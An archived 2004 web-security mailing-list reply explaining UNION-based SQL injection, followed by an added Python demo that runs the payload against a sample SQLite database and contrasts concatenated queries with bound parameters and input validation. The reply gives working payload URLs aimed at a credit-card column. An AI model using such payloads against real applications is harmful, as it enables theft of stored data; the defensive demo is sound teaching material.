WebApp Sec mailing list archives
Re: SQL Injection question
From: lazy () server gwsh gda pl
Date: Wed, 26 May 2004 20:11:06 +0200
On Thu, May 27, 2004 at 01:49:45AM +1000, Serg Belokamen wrote:
> I am interested to know (if possible) how to extend an SQL injection attack to display requested information from the injected query rather than the one coded into the software.
> Attack: http://domain.com/script.php?showdata.php=3;select * from table where id=1
You can use a UNION statement:
http://domain.com/script.php?showdata.php=3' UNION select * from table where id=1
The trick is that the 2 queries have to give identical output (same types and number of columns); you can do it by using NULL or some bogus data as placeholders. If the left query returns 1 integer and a varchar and you want to query for an integer, use sth like this:
showdata.php=3' UNION select "XXX",cc_number from table where id=1--
Google for Blindfolded_SQL_Injection.pdf if you want to know more.
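Added example, not part of the original post or thread: the UNION case from the reply above, run against an in-memory SQLite database to show the concatenated query beside a bound-parameter version that treats the same input as data only. The table names, column names, rows and function names are assumptions constructed for the example.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE cards (id INTEGER PRIMARY KEY, cc_number TEXT);
        INSERT INTO articles VALUES (3, 'Hello');
        INSERT INTO cards VALUES (1, '0000-CONSTRUCTED');
    """)
    return db

def show_concatenated(db, showdata):
    # Vulnerable: the request value becomes part of the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT id, title FROM articles WHERE id = '" + showdata + "'"
    return db.execute(sql).fetchall()

def show_bound(db, showdata):
    # Hardened: the value is bound as a parameter and is only ever compared
    # against id; it cannot add a UNION branch to the statement.
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return db.execute(sql, (showdata,)).fetchall()

def show_bound_strict(db, showdata):
    # Defence in depth: reject anything that is not a plain integer id
    # before it reaches the database at all.
    if not re.fullmatch(r"[0-9]+", showdata):
        raise ValueError("id must be numeric")
    return show_bound(db, showdata)

# Constructed input in the shape described in the reply above.
PAYLOAD = "3' UNION SELECT NULL, cc_number FROM cards WHERE id=1--"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", show_concatenated(db, PAYLOAD))
    print("bound:       ", show_bound(db, PAYLOAD))
    print("bound, id=3: ", show_bound(db, "3"))
```

The rejected input in show_bound_strict is also a useful thing to log: a non-numeric value in a numeric id parameter is a cheap detection signal for probing.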